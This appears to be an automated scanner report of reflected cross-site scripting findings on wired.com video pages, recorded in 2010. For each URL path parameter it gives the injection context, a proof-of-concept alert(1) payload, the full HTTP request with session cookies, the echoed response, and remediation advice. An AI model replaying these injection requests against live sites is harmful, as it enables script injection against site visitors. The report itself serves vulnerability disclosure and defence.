<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video71840--><script>alert(1)</script>ad628cf891f/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67bfd"><a>253750acaf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos67bfd"><a>253750acaf/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:46:57 GMT Date: Mon, 22 Nov 2010 00:41:57 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106758
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos67bfd"><a>253750acaf c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55513"-alert(1)-"bef2343d7bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos55513"-alert(1)-"bef2343d7bd/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:43 GMT Date: Mon, 22 Nov 2010 00:42:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106799
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 603f0"><a>2b228d8fd46 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest603f0"><a>2b228d8fd46/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=279 Expires: Mon, 22 Nov 2010 00:47:35 GMT Date: Mon, 22 Nov 2010 00:42:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106778
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest603f0"><a>2b228d8fd46"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b9e0"-alert(1)-"7ee84ee8e21 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest8b9e0"-alert(1)-"7ee84ee8e21/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=275 Expires: Mon, 22 Nov 2010 00:48:43 GMT Date: Mon, 22 Nov 2010 00:44:08 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106774
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... ipt type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96572"-alert(1)-"8ce4e8daf48 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/181581663396572"-alert(1)-"8ce4e8daf48/back-to-the-future-physics-the-river-of-time/653293411001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=283 Expires: Mon, 22 Nov 2010 00:49:25 GMT Date: Mon, 22 Nov 2010 00:44:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106746
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd377"-alert(1)-"b5566d1a53d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-timefd377"-alert(1)-"b5566d1a53d/653293411001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:58 GMT Date: Mon, 22 Nov 2010 00:44:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106791
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... ipt type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5349f"-alert(1)-"5db7cf1b00 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/6532934110015349f"-alert(1)-"5db7cf1b00 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=286 Expires: Mon, 22 Nov 2010 00:50:03 GMT Date: Mon, 22 Nov 2010 00:45:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106760
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 99d40--><script>alert(1)</script>9411b968572 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video99d40--><script>alert(1)</script>9411b968572/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29460 Vary: Accept-Encoding Cache-Control: max-age=277 Expires: Mon, 22 Nov 2010 00:40:36 GMT Date: Mon, 22 Nov 2010 00:35:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video99d40--><script>alert(1)</script>9411b968572/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22e59"><a>4921c5333d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video22e59"><a>4921c5333d1/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29421 Vary: Accept-Encoding Cache-Control: max-age=295 Expires: Mon, 22 Nov 2010 00:39:54 GMT Date: Mon, 22 Nov 2010 00:34:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video22e59"><a>4921c5333d1 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1779"><a>34b474d6ab2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videosc1779"><a>34b474d6ab2/latest/1815816633/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=271 Expires: Mon, 22 Nov 2010 00:40:36 GMT Date: Mon, 22 Nov 2010 00:36:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videosc1779"><a>34b474d6ab2 c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 231ac"-alert(1)-"9a0830762d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos231ac"-alert(1)-"9a0830762d1/latest/1815816633/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:09 GMT Date: Mon, 22 Nov 2010 00:37:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106774
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e72e5"><a>daaf07f0b88 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/lateste72e5"><a>daaf07f0b88/1815816633/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=289 Expires: Mon, 22 Nov 2010 00:42:06 GMT Date: Mon, 22 Nov 2010 00:37:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106760
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_lateste72e5"><a>daaf07f0b88"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad97a"-alert(1)-"e1623f9f7aa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latestad97a"-alert(1)-"e1623f9f7aa/1815816633/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:14 GMT Date: Mon, 22 Nov 2010 00:38:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106771
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae6c6"-alert(1)-"a7781cc6a32 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633ae6c6"-alert(1)-"a7781cc6a32/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:30 GMT Date: Mon, 22 Nov 2010 00:38:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106682
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57180"-alert(1)-"e82ff3c20cc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/battle-los-angeles-trailer57180"-alert(1)-"e82ff3c20cc/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=277 Expires: Mon, 22 Nov 2010 00:43:17 GMT Date: Mon, 22 Nov 2010 00:38:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106773
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5f41"-alert(1)-"ec58efd1064 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001c5f41"-alert(1)-"ec58efd1064 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=296 Expires: Mon, 22 Nov 2010 00:43:50 GMT Date: Mon, 22 Nov 2010 00:38:54 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106728
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload c71e2--><script>alert(1)</script>6815d60c49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoc71e2--><script>alert(1)</script>6815d60c49/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29477 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:39 GMT Date: Mon, 22 Nov 2010 00:36:39 GMT Connection: close
